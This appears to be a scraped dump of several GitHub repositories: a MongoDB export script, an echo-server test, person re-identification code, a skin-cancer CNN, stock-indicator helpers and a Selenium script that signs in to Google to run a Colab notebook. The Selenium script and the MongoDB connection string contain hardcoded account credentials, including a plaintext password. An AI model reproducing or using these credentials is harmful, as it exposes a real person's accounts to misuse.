https://github.com/Nirav8/Falsk_server
|
b1f9ac7de1de16a91506a00a9dfe45b15ef117b9
|
f196abea99113a7089cb0f1f97d50aec16e6518e
|
32eddd0b556a7295b80025e7190aec89c3990b7e
|
refs/heads/master
| 2023-05-10T01:57:26.717338 | 2021-06-05T09:19:09 | 2021-06-05T09:19:09 | 370,787,398 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6227678656578064,
"alphanum_fraction": 0.625,
"avg_line_length": 24.571428298950195,
"blob_id": "dde8fd0c3acbe833b717f87848f912b489531655",
"content_id": "f72735c2bc2aa776cce45f2885284304d652378b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 896,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 35,
"path": "/apps/useraccount/model.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "from apps import compare_hash, convert_hash\nfrom connection.mongoconnection import mongo\n\nusers = mongo.Login.users\n\n\"\"\"\nwe can implement hear for making it more convineant\nlike make possible with username too\n\"\"\"\ndef _isuser(email):\n user = users.find_one({'email' : email})\n return user\n\ndef _changepassword(new_pass , email):\n try:\n users.update_one({\"email\" : email} , {'$set' : {\"password\" : new_pass}})\n return 1\n except Exception as ex:\n return ex\n\ndef _changeusername(email , newusername):\n try:\n users.update_one({'email' : email} , {'$set' : {'username' : newusername}})\n return 1\n except Exception as ex:\n return ex\n\ndef _isusernameavailabe(username):\n try:\n if users.find_one({\"username\" : username}):\n return False\n else:\n return True\n except Exception as ex:\n return True\n\n"
},
{
"alpha_fraction": 0.5940330028533936,
"alphanum_fraction": 0.6068193912506104,
"avg_line_length": 30.81355857849121,
"blob_id": "6528ca8d2f1140bdf242ec1ea3fe184e2dedf3c2",
"content_id": "f76beb8b49ba27f2ff110f2258910f3a1047b0a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1877,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 59,
"path": "/apps/useraccount/views.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "from pymongo.collection import ReturnDocument\nfrom apps import compare_hash, convert_hash, login_required\nfrom flask import Blueprint\nfrom flask.globals import request, session\nfrom flask.json import jsonify\n\nfrom .model import _isuser, _changepassword, _changeusername, _isusernameavailabe\n\nuseraccount = Blueprint('useraccount' , __name__)\n\[email protected](\"/logout\", methods = ['GET', 'POST'])\ndef logout():\n session.clear()\n return jsonify(),301\n \n\n#TODO create an decorator and make is secure\n#TODO maek template for changing password\n\[email protected](\"/changepassword\", methods=['GET', 'POST'])\n@login_required\ndef changepassword():\n if request.method == 'GET':\n return jsonify('comming soon'), 501\n elif request.method == 'POST':\n _json = request.json\n _email = _json['email']\n _user = _isuser(_email)\n \n if _user:\n _iscorrect = compare_hash(_user['password'], _json['password'])\n if _iscorrect:\n _ischanged = _changepassword(convert_hash(_json['new_password']), _email)\n if _ischanged:\n return jsonify({'message': 'changed'}), 200\n else:\n return jsonify(), 304\n else:\n return jsonify({'message' : 'password ios incorret'}), 451\n\[email protected](\"/changeusername\", methods=['GET' , 'POST'])\n@login_required\ndef changeusername():\n if request.method == 'GET':\n return jsonify(), 501\n\n elif request.method == 'POST':\n _json = request.json\n _username = _json['email']\n _newusername = _json['new_username']\n \n _isavailable = _isusernameavailabe(_newusername)\n\n if _isavailable:\n if _changeusername(_username, _newusername):\n return jsonify(), 204\n\n else:\n return jsonify(), 401\n"
},
{
"alpha_fraction": 0.47843942046165466,
"alphanum_fraction": 0.6817248463630676,
"avg_line_length": 15.233333587646484,
"blob_id": "46485fb1a4a1aaf5d2b1f5b26774d81d26892c80",
"content_id": "8fb05e55c12ac36dbeae126b900846bae3dba3d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 487,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 30,
"path": "/requirements.txt",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "aws==0.2.5\nbcrypt==3.2.0\nboto==2.49.0\ncachelib==0.1.1\ncffi==1.14.5\nclick==8.0.1\ncolorama==0.4.4\ncryptography==3.4.7\nfabric==2.6.0\nFlask==2.0.1\nFlask-Cors==3.0.10\nflask-redis==0.4.0\nFlask-Session==0.3.2\nimportlib-metadata==4.4.0\ninvoke==1.5.0\nitsdangerous==2.0.1\nJinja2==3.0.1\nMarkupSafe==2.0.1\nparamiko==2.7.2\npathlib2==2.3.5\nprettytable==2.1.0\npycparser==2.20\npymongo==3.11.4\nPyNaCl==1.4.0\nredis==3.5.3\nsix==1.16.0\ntyping-extensions==3.10.0.0\nwcwidth==0.2.5\nWerkzeug==2.0.1\nzipp==3.4.1\n"
},
{
"alpha_fraction": 0.556506872177124,
"alphanum_fraction": 0.5667808055877686,
"avg_line_length": 26.571428298950195,
"blob_id": "f1db02056fb37e0082d1cd7024801f1e64fbd2d1",
"content_id": "fb418e1aa79c2afda53d0edf8f3cd4cdbf683b8e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 584,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 21,
"path": "/apps/signin/model.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "from connection.mongoconnection import mongo\n\nusers = mongo.Login['users']\ntemp_user = mongo.Login['temp_users']\n\ndef _isuser(isemail, username):\n\n if isemail == True:\n _user = users.find_one({'email' : username})\n _temp = temp_user.find_one({'email' : username})\n if _temp:\n return '201'\n\n elif isemail == False:\n _user = users.find_one({'username' : username})\n _temp = temp_user.find_one({'username' : username})\n if _temp:\n return '201'\n \n a = users.find_one({'email' : 'namorgit [email protected]'})\n return _user\n\n "
},
{
"alpha_fraction": 0.6344195604324341,
"alphanum_fraction": 0.6384928822517395,
"avg_line_length": 26.30555534362793,
"blob_id": "51a97909bce18aecb96b5864127ab00dc9a96651",
"content_id": "6bad60afad2d84a7096538095871e7323044c95c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 982,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 36,
"path": "/apps/signup/model.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "from bson.objectid import ObjectId\nfrom connection.mongoconnection import mongo\n\ntemp_user = mongo.Login.temp_users\nusers = mongo.Login.users\n\ndef _isuser(email , username):\n email = users.find_one({'email' : email})\n usename = users.find_one({'username' : username})\n if email != None or usename != None:\n return 1\n else:\n return 0\n\ndef _istempuser(email, username):\n tempemail = temp_user.find_one({'email' : email})\n tusername = temp_user.find_one({'username' : username})\n if tempemail != None or tusername != None:\n return 1\n else:\n return 0\n\ndef _insert(data):\n inserted = temp_user.insert_one(data)\n _new_id = inserted.inserted_id\n return _new_id\n\ndef _verifyuser(userid):\n user = temp_user.find_one({'_id' : ObjectId(userid)})\n user.pop('_id')\n try:\n temp_user.delete_one({'_id' : ObjectId(userid)})\n except Exception as ex:\n return ex\n added = users.insert_one(user)\n return added"
},
{
"alpha_fraction": 0.6536796689033508,
"alphanum_fraction": 0.6753246784210205,
"avg_line_length": 20.090909957885742,
"blob_id": "47b4dbfcd9b5aee3c3a892916049be36ef52d447",
"content_id": "516971aeca7d5f6847348b4e762603722e73cf46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 231,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 11,
"path": "/connection/mongoconnection.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "import pymongo\nfrom pymongo import mongo_client\n\ntry:\n mongo = pymongo.MongoClient(\n host='localhost',\n port = 27017\n )\n print(mongo.server_info)\nexcept Exception as ex:\n print(\"database connection error\")"
},
{
"alpha_fraction": 0.7358490824699402,
"alphanum_fraction": 0.7509434223175049,
"avg_line_length": 27.648649215698242,
"blob_id": "962b03808ca127897c00a9da6d7aa6a17cfa5a9e",
"content_id": "6922206a6f3ac8d13ca94b2f5fef981d9e3faf0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1060,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 37,
"path": "/server.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "from flask import Flask\nfrom flask.globals import session\nfrom flask.helpers import url_for\nfrom flask_cors import CORS\nfrom flask_session import Session\nfrom flask_redis import FlaskRedis\nimport redis\n\nfrom apps.signin.views import login\nfrom apps.signup.views import signup\nfrom apps.useractivity.views import activity\nfrom apps.useraccount.views import useraccount\n\napp = Flask(__name__)\n\nredis = FlaskRedis(app)\n\napp.config['SESSION_TYPE'] = 'filesystem'\napp.config['SESSION_PERMANENT'] = False\n# app.config['SESSION_USE_SIGNER'] = True\napp.config['SECRET_KET'] = \"#22253%6DFvskleg$2%^7birsmgw77%55##\"\n# app.config['SESSION_REDIS'] = redis.from_url('redis://localhost:6379')\n\napp.register_blueprint(login , url_prefix = '/login')\napp.register_blueprint(signup , url_prefix = '/signup')\napp.register_blueprint(activity, url_prefix='/user')\napp.register_blueprint(useraccount, url_prefix='/account')\n\n#from cross platform\nCORS(app)\nSession(app)\n\nsession = Session()\n\nif __name__ =='__main__':\n session.init_app(app)\n app.run(debug=True,threaded= True)\n"
},
{
"alpha_fraction": 0.5252951383590698,
"alphanum_fraction": 0.5328836441040039,
"avg_line_length": 31.94444465637207,
"blob_id": "969a3ef1cb1304c327d05d45a75bd995df35ddc9",
"content_id": "f8672adfa0b248f599bd04af54ab7c04e50a31a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1186,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 36,
"path": "/apps/signin/views.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "from apps import check_email, compare_hash\nfrom flask import Blueprint, request, render_template, redirect\nfrom flask.json import jsonify\nfrom .model import _isuser\nfrom flask import session\n\nlogin = Blueprint('login', __name__)\n\[email protected]('/user', methods =['GET' , 'POST'])\ndef Login():\n try:\n if request.method == 'GET':\n return render_template('login/login.html')\n\n elif request.method == 'POST':\n _json = request.json\n _username = _json['username']\n _isemail = check_email(_username)\n\n _user = _isuser(isemail = _isemail, username = _username)\n\n if _user == None:\n return jsonify(\"user not exist\"), 450\n\n else:\n __password = _json['password']\n _ans = compare_hash(_user['password'], __password)\n\n if _ans == True:\n session['_username'] = _username\n return jsonify({\"message\" : \"login sucsess fully\"}), 201\n\n else:\n return jsonify({'result': 'password is not correct'}), 451\n except Exception as ex:\n print(ex, \"**************************\")\n"
},
{
"alpha_fraction": 0.5518617033958435,
"alphanum_fraction": 0.563829779624939,
"avg_line_length": 19.29729652404785,
"blob_id": "933ec593a84f2c0074e40920d8fff90ad0c56a66",
"content_id": "da7b11e50988daacf2fa2bf15822d811549f9e90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 752,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 37,
"path": "/apps/__init__.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "import re\nimport hashlib\nfrom flask import session\nfrom functools import wraps\n\nfrom flask.json import jsonify\n\nregex = '^(\\w|\\.|\\_|\\-)+[@](\\w|\\_|\\-|\\.)+[.]\\w{2,3}$'\n\n\ndef check_email(email):\n m = re.search(regex, email)\n if m:\n return True\n else:\n return False\n\ndef convert_hash(a):\n a = str(a)\n a = bytes(a, 'utf-8')\n return(hashlib.sha256(a).hexdigest())\n\ndef compare_hash(old,new):\n new = convert_hash(new)\n if old == new:\n return True\n else:\n return False\n\ndef login_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if '_username' in session:\n return f(*args, **kwargs)\n else:\n return jsonify({\"message\": \"Login Requierd\"}), 401\n return wrap\n\n"
},
{
"alpha_fraction": 0.7253521084785461,
"alphanum_fraction": 0.7253521084785461,
"avg_line_length": 27.299999237060547,
"blob_id": "daec7743cf65157a35c3f870d307732f09c1875a",
"content_id": "efd8b4609e11fd354acbfb984d64036a6e36db1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 284,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 10,
"path": "/apps/useractivity/views.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "from flask import Blueprint, request\nfrom flask.json import jsonify\nfrom flask import session\n\nactivity = Blueprint('useractivity' , __name__)\n\[email protected]('/home', methods=['GET'])\ndef Home():\n print(request.headers['Cookie'])\n return jsonify('welcome to social connect')\n\n"
},
{
"alpha_fraction": 0.46464645862579346,
"alphanum_fraction": 0.47508418560028076,
"avg_line_length": 36.96154022216797,
"blob_id": "dc0f593595acb962fddc49d8f77b28b75368f7ab",
"content_id": "704066d614745066369dba332dade8f09a68510d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2970,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 78,
"path": "/apps/signup/views.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "from flask import json\nfrom flask.templating import render_template\nfrom pymongo.message import _insert\nfrom apps import check_email, convert_hash\nfrom flask import Blueprint, redirect\nfrom flask.globals import request\nfrom flask.json import jsonify\nfrom .model import _istempuser, _insert, _isuser, _verifyuser\n\nsignup = Blueprint('signup' , __name__ )\n\[email protected]('/user', methods = ['GET' , 'POST'])\ndef create_user():\n if request.method == 'GET':\n return render_template('signup/signup.html')\n elif request.method == 'POST':\n try: \n _json = request.json\n _email = _json['email']\n _isemail = check_email(_email)\n _username = _json['username']\n\n if _isemail == False:\n return jsonify('not valid email')\n\n else:\n _tempuser = _istempuser(email = _email, username = _username)\n _user = _isuser(email = _email, username = _username)\n\n print(_tempuser, _user , \"********************************8\")\n\n if _user == 0 and _tempuser == 1:\n return jsonify({'result' : \"email allredy in used, please verify your email\"}),250\n \n\n elif _user == 1 and _tempuser == 0:\n return jsonify({\n \"message\" : \"you are allredy verifid\"\n }), 251\n\n elif _user == 1 and _tempuser == 1:\n return jsonify({\n \"message\" : \"username or email is allredy in used\"\n }), 252\n\n elif _user == 0 and _tempuser == 0:\n _password = _json['password']\n _password = convert_hash(_password)\n _userdata = {\n 'username': _username,\n \"email\": _email,\n \"password\": _password,\n }\n inserted = _insert(_userdata)\n #send email for verifying account\n\n # emailsending(_email, _name, \"http://localhost:9090/verify/{}?token={}\".format(_email, _token)) \n return jsonify({\n 'reult: ': \"User Created\",\n 'id' : str(inserted)\n }), 201\n except Exception as ex:\n print(\"***************************************************\")\n print(ex)\n print(\"***************************************************\")\n\[email protected](\"/verify/<userid>\", methods = ['GET' , 'POST'])\n\n#TODO:make decorator at hear\n#TODO :-crate gmail app for sending email and make a new temolate\n\ndef verify(userid):\n if request.method == 'GET':\n return jsonify(\"we have nothing yet,,,\"), 200\n elif request.method == 'POST':\n verified = _verifyuser(userid=userid)\n print(verified)\n return jsonify('verified'), 200\n \n\n"
}
] | 11 |
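
The `convert_hash` and `compare_hash` helpers in `apps/__init__.py` above implement an unsalted SHA-256 round trip; a minimal standalone check of that behaviour, using only the standard library:

```python
import hashlib

def convert_hash(a):
    # Hash the string form of the input, as the repo helpers do.
    return hashlib.sha256(bytes(str(a), "utf-8")).hexdigest()

def compare_hash(old, new):
    return old == convert_hash(new)

stored = convert_hash("s3cret")           # what signup persists
assert compare_hash(stored, "s3cret")     # correct password matches
assert not compare_hash(stored, "wrong")  # wrong password does not
```

Plain unsalted SHA-256 is weak for password storage; the repo's `requirements.txt` already pins `bcrypt==3.2.0`, which would be the stronger choice here.
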
ramonpin/marmita-demo
|
https://github.com/ramonpin/marmita-demo
|
7e10f4d663f7c9b4e61ae560d9b79ba98c8b2a7a
|
48e1abaee890d7ae43c87db8719bb998b311ff00
|
9744539656af6b05a98a668aacef808473a4bbb2
|
refs/heads/main
| 2023-01-12T17:29:50.646828 | 2020-11-26T11:47:00 | 2020-11-26T16:24:11 | 314,317,275 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7001795172691345,
"alphanum_fraction": 0.7121484279632568,
"avg_line_length": 24.31818199157715,
"blob_id": "d915272e33d0f3e73e1eb96dd422ae4153bd5d70",
"content_id": "db6bd4a58d40c3b274097c03adcd82264eb1f449",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1671,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 66,
"path": "/README.md",
"repo_name": "ramonpin/marmita-demo",
"src_encoding": "UTF-8",
"text": "## Marmita SDK Demo\nJust a demo of Scala -> Python integration.\n\n### Tooling\n\nTo work in this package is recomended to use `tox` python automation tool. You can install `tox` in your environment with:\n\n```bash\n$> python3 -m venv $HOME/.tox\n$> $HOME/.tox/bin/pip install tox==3.20.1\n$> ln -s $HOME/.tox/bin/tox $HOME/bin/tox\n```\n\nWhere you can replace `$HOME/bin` for any directory where you install your user tools (and is in your path).\n\nNow you can check it works with:\n\n```bash\n$> tox --version\n3.20.1 imported from /home/user/.tox/lib/python3.8/site-packages/tox/__init__.py\n```\n\n##### Development\n\nTo install the project in a virtualenv for development use:\n\n```bash\n$> tox --devenv <venv_dir> -e py<xx>\n```\n\nWhere `venv_dir` is the directory where you want to create the virtual environment and `xx` can be `36`, `37` or `38` \ndepending on your preference of python3 version.\n\nA `marmita-demo` script should be created and available in the path, pointing to the local project files.\nThe local installation only needs to be done again if the main method or the `setup.py` script changes.\n\nYou can run all tests and pass the linter check on all the available python3 versions at once with:\n\n```bash\n$> tox\n```\n\nOr you can just try one with:\n\n```bash\n$> tox -e py<xx>\n```\n\n##### Run demo script\n\nJust to try that the installation process works and that integration works properly you can try:\n\n```bash\n$> tox -qe run\n```\n\n##### Release as python wheel\n\nTo package for distribution, execute the following:\n\n```bash\n$> tox -e package\n```\n\nThe above command creates a `marmitasdk-<version>-py3-none-any.whl` executable at `dist` directory. This \nfile can be distributed.\n"
},
{
"alpha_fraction": 0.6914153099060059,
"alphanum_fraction": 0.7030162215232849,
"avg_line_length": 22.94444465637207,
"blob_id": "db3471fad86764d5c464555f9cd09ff388006642",
"content_id": "17d1dc8a1f6de1ab73128de2b74a214e3233d742",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 18,
"path": "/src/marmitasdk/main.py",
"repo_name": "ramonpin/marmita-demo",
"src_encoding": "UTF-8",
"text": "from loguru import logger\n\nimport marmitasdk.connector # noqa: F401\nfrom com.orange.marmita.registry.client import RegistryClient\n\n\ndef get_registry_handler(url, timestamp, timestamp_meta):\n return RegistryClient(url, timestamp, timestamp_meta)\n\n\ndef run():\n registry = get_registry_handler(\"url\", 0, 0)\n logger.info(\"Starting demo...\")\n logger.info(f\"With registry {registry}\")\n\n\nif __name__ == \"__main__\":\n run()\n"
},
{
"alpha_fraction": 0.7091836929321289,
"alphanum_fraction": 0.7346938848495483,
"avg_line_length": 27,
"blob_id": "4f1c5f5504314d61212d22168f6dddc03f02b7b7",
"content_id": "606329caed756fee980d65b340f116ea1ca3c316",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 196,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 7,
"path": "/tests/test_registry.py",
"repo_name": "ramonpin/marmita-demo",
"src_encoding": "UTF-8",
"text": "import marmitasdk.connector # noqa: F401\nfrom marmitasdk.main import get_registry_handler\n\n\ndef test_registry():\n registry = get_registry_handler(\"url\", 0, 0)\n assert registry is not None\n"
},
{
"alpha_fraction": 0.6991150379180908,
"alphanum_fraction": 0.7053097486495972,
"avg_line_length": 29.54054069519043,
"blob_id": "bd8aac15252f19bd1d1e3060e1d923abf97a6759",
"content_id": "7e58ea75f007a3a5d8d1175850dbab4494caf7b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1130,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 37,
"path": "/src/marmitasdk/connector.py",
"repo_name": "ramonpin/marmita-demo",
"src_encoding": "UTF-8",
"text": "\"\"\"\nThis module extracts from main code the boilerplate code needed\nto boostrap JVM integration with jpype. It must be imported as\nthe first import for any module that uses JVM classes. To avoid\nlinter errors we must use:\n\n import connector # noqa FA403\n\nWith this the rest of the python code can be written in a\ncompletly standard way without warnings.\n\nWe are sure all code runs on the same JVM because python ensures\neach module is loaded just once.\n\"\"\"\nimport os\nfrom loguru import logger\n\nimport jpype\nimport jpype.imports\n\nif not jpype.isJVMStarted():\n logger.info(\"Initializing marmita connector...\")\n\n # Load needed jars from current dir\n _base = f\"{os.path.dirname(__file__)}\"\n _jars_dir = f\"{_base}/jars\"\n _jars = list(map(lambda f: f\"{_jars_dir}/{f}\", os.listdir(_jars_dir)))\n\n # Log ClassPath composition\n logger.info(\"ClassPath:\")\n for jar in _jars:\n logger.info(f\" {jar}\")\n\n # Bootstrap a JVM\n _jvmPath = jpype.getDefaultJVMPath()\n logger.info(f\"JVM used {_jvmPath}\")\n jpype.startJVM(_jvmPath, f\"-Dlog4j.configurationFile={_base}/log4j/log4j2.xml\", classpath=_jars)\n"
},
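The connector module above leans on jpype's one-JVM-per-process model: whichever module imports it first pays the startup cost, and every later import is a no-op because Python caches modules. A minimal standalone sketch of that bootstrap pattern (the jar path is a placeholder):

```python
import jpype
import jpype.imports  # enables `from java.x import Y` style imports

# Guard against a second start: jpype allows only one JVM per process,
# and Python's module cache guarantees this block runs at most once.
if not jpype.isJVMStarted():
    jpype.startJVM(jpype.getDefaultJVMPath(), classpath=["path/to/your.jar"])

# Once the JVM is up, Java packages import like Python modules:
from java.lang import System

System.out.println("JVM is up")
```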
{
"alpha_fraction": 0.7104247212409973,
"alphanum_fraction": 0.7220077514648438,
"avg_line_length": 36,
"blob_id": "11ecc6527a528e83ad7ba93e30d511e21e6d0f60",
"content_id": "03625cf047feb2dc0591c380484a49acac518fcf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 259,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 7,
"path": "/upgrade-jar.sh",
"repo_name": "ramonpin/marmita-demo",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\nFEATURESTORE_REPO=${HOME}/development/feature-store\npushd \"${FEATURESTORE_REPO}\" >/dev/null || exit\n./gradlew --quiet build\n\npopd >/dev/null || exit\ncp \"${FEATURESTORE_REPO}\"/sdk/build/libs/sdk-0.1.0-SNAPSHOT-all.jar src/marmitasdk/jars/.\n"
}
] | 5 |
notptr/mass-file-extensions-renamer
|
https://github.com/notptr/mass-file-extensions-renamer
|
220074ff238b38ceaf54568100dfbaaf9e151e47
|
7355d13d4308aecd9afe7a59b8c598a9232614d2
|
68e7b07c2da3e67830d97d8ca9c8b226ab7d3690
|
refs/heads/master
| 2021-01-23T02:54:56.853449 | 2014-05-14T21:52:04 | 2014-05-14T21:52:04 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6235038042068481,
"alphanum_fraction": 0.6332970857620239,
"avg_line_length": 23.83783721923828,
"blob_id": "711c7eddd6a1f2dc90549321712f07e7537fa536",
"content_id": "ea6f6ba0d6e46a02a6c7e297f935845d1bccf220",
"detected_licenses": [
"Unlicense"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 919,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 37,
"path": "/rnmassfiles.py",
"repo_name": "notptr/mass-file-extensions-renamer",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#programmer Matthew Deig\n#idealy made for linux but it should work in windows by giving \\\\ instead\n\nimport os,glob,sys\n\ndef getdirlisting(path,ext):\n\treturn glob.glob(path+os.sep+\"*.\"+ext)\n\t\ndef changingExt(listing, ext, newext):\n\tfor filename in listing:\n\t\tnewfilename = filename.split(\".\")\n\t\t\n\t\tif newfilename[1] == ext:\n\t\t\tnewfilename[1] = \".\"+newext\n\t\t\tos.rename(filename,newfilename[0]+newfilename[1])\n\n\t\nif __name__ == \"__main__\":\n\tfilepath = \"\"\n\text = \"\"\n\tnewext = \"\"\n\tx=0\n\tfor args in sys.argv:\n\t\tif args == \"-p\" or args == \"--path\":\n\t\t\tfilepath = sys.argv[x+1]\n\t\telif args == \"-e\":\n\t\t\text = sys.argv[x+1]\n\t\telif args == \"-ne\":\n\t\t\tnewext = sys.argv[x+1]\n\t\tx+=1\n\t\t\t\n\tif filepath != \"\" and ext != \"\" and newext != \"\":\n\t\tlisting = getdirlisting(filepath,ext)\n\t\tchangingExt(listing, ext, newext)\n\telse:\n\t\tprint(\"usage -p for the path to the maps\\n-e is the old extension\\n-ne is the new extension\")\n"
}
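A modern alternative sketch of the same bulk rename using `pathlib`; `Path.with_suffix` replaces only the final extension, which sidesteps the `filename.split(".")` above breaking on names that contain extra dots. The function name and example paths are illustrative only.

```python
from pathlib import Path

def rename_extensions(path, ext, newext):
    # glob matches only the old extension; with_suffix swaps just the last suffix
    for f in Path(path).glob(f"*.{ext}"):
        f.rename(f.with_suffix(f".{newext}"))

# rename_extensions("/some/dir", "jpeg", "jpg")  # hypothetical example call
```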
] | 1 |
jiajunxiong/astock
|
https://github.com/jiajunxiong/astock
|
9a9f431f988d0f5d0665783b7f51fd1717afe135
|
b1969b66705199c4cded64fe224e5c51eaeeecaa
|
bd550b1736220bdf4f0178a920e1cd2599b229af
|
refs/heads/master
| 2020-03-23T11:38:48.746601 | 2018-07-19T02:26:50 | 2018-07-19T02:26:50 | 139,682,074 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6024433970451355,
"alphanum_fraction": 0.6164418458938599,
"avg_line_length": 34.08035659790039,
"blob_id": "03d49024930ede046d22cda4142fbdec50b3b203",
"content_id": "e7bbb8507ef54faddab90497fe460b12e255c1ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3929,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 112,
"path": "/sData.py",
"repo_name": "jiajunxiong/astock",
"src_encoding": "UTF-8",
"text": "\"\"\"\nshow back-testing result\n\"\"\"\nimport os\nimport csv\nimport math\nfrom rData import *\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\nstock_num = 5\nholding_period = 2\ncapital = 10000\n\n# equal capital or equal lot\n# equal_capital_flag = True \n# equal_lot_flag = True\n\ndef transactionMTMDailyPnl(symbol, date_counter, lot, panel_data):\n \n transaction_pnl = 0.0\n \n today_close = panel_data.major_xs(symbol).CLOSE[date_counter] \n today_open = panel_data.major_xs(symbol).OPEN[date_counter]\n \n if not (math.isnan(today_close) or math.isnan(today_open)):\n transaction_pnl = (today_close - today_open) * lot\n return transaction_pnl\n \ndef priorperiodMTMDailyPnl_1(symbol, date_counter, panel_data):\n\n priorperiod_pnl = 0.0\n lot = 0\n \n today_open = panel_data.major_xs(symbol).OPEN[date_counter]\n today_close = panel_data.major_xs(symbol).CLOSE[date_counter] \n yesterday_close = panel_data.major_xs(symbol).CLOSE[date_counter-1]\n \n if not (math.isnan(today_close) or math.isnan(yesterday_close) or math.isnan(today_open)):\n lot = capital / today_open\n priorperiod_pnl = (today_close - yesterday_close) * lot\n return priorperiod_pnl, lot\n \ndef priorperiodMTMDailyPnl_2(symbol, date_counter, lot, panel_data):\n\n priorperiod_pnl = 0.0\n \n today_open = panel_data.major_xs(symbol).OPEN[date_counter]\n today_close = panel_data.major_xs(symbol).CLOSE[date_counter] \n yesterday_close = panel_data.major_xs(symbol).CLOSE[date_counter-1]\n \n if not (math.isnan(today_close) or math.isnan(yesterday_close) or math.isnan(today_open)):\n priorperiod_pnl = (today_close - yesterday_close) * lot\n return priorperiod_pnl\n\ndef getReturn():\n pnls = []\n list_symbol = []\n list_lot = []\n buy_sell_lot = [[]] * int(holding_period-1)\n buy_sell_list = [[]] * int(holding_period)\n date_counter = 0\n panel_data = readData(\"./data/zz500/\")\n path_rank = \"./alpha191/date/rank_ew/\"\n for file in os.listdir(path_rank):\n # read symbol.csv file and calculate mtmDailyPnl append to pnl\n print(buy_sell_list)\n print(buy_sell_lot)\n priorperiod_pnl = 0.0\n list_lot = []\n for i in range(holding_period-1):\n if (i==0):\n for symbol in buy_sell_list[0]:\n pnl, lot = priorperiodMTMDailyPnl_1(symbol, date_counter, panel_data)\n list_lot.append(lot)\n priorperiod_pnl += pnl\n buy_sell_lot = [list_lot] + buy_sell_lot\n else:\n for symbol in buy_sell_list[i]:\n index = buy_sell_list[i].index(symbol)\n pnl = priorperiodMTMDailyPnl_2(symbol, date_counter, buy_sell_lot[i][index], panel_data)\n priorperiod_pnl += pnl\n \n transaction_pnl = 0.0\n for symbol in buy_sell_list[holding_period-1]:\n index = buy_sell_list[holding_period-1].index(symbol)\n if buy_sell_lot[holding_period-1]:\n pnl = transactionMTMDailyPnl(symbol, date_counter, buy_sell_lot[holding_period-1][index], panel_data)\n else:\n pnl = 0.0\n transaction_pnl += pnl\n data = pd.read_csv(path_rank + file, index_col=0)\n list_symbol = data.tail(10).index.tolist()\n # calculate sw \n index = list_symbol.index(\"Row_sum\")\n del list_symbol[index:]\n list_symbol = [x[:6] for x in list_symbol]\n list_symbol = list_symbol[-1*stock_num:] # tomorrow to buy\n buy_sell_list = [list_symbol] + buy_sell_list\n \n pnls.append(transaction_pnl + priorperiod_pnl)\n date_counter += 1\n return pnls\n \npnls = getReturn()\npnls = [round(x, 2) for x in pnls]\ncum_pnls = 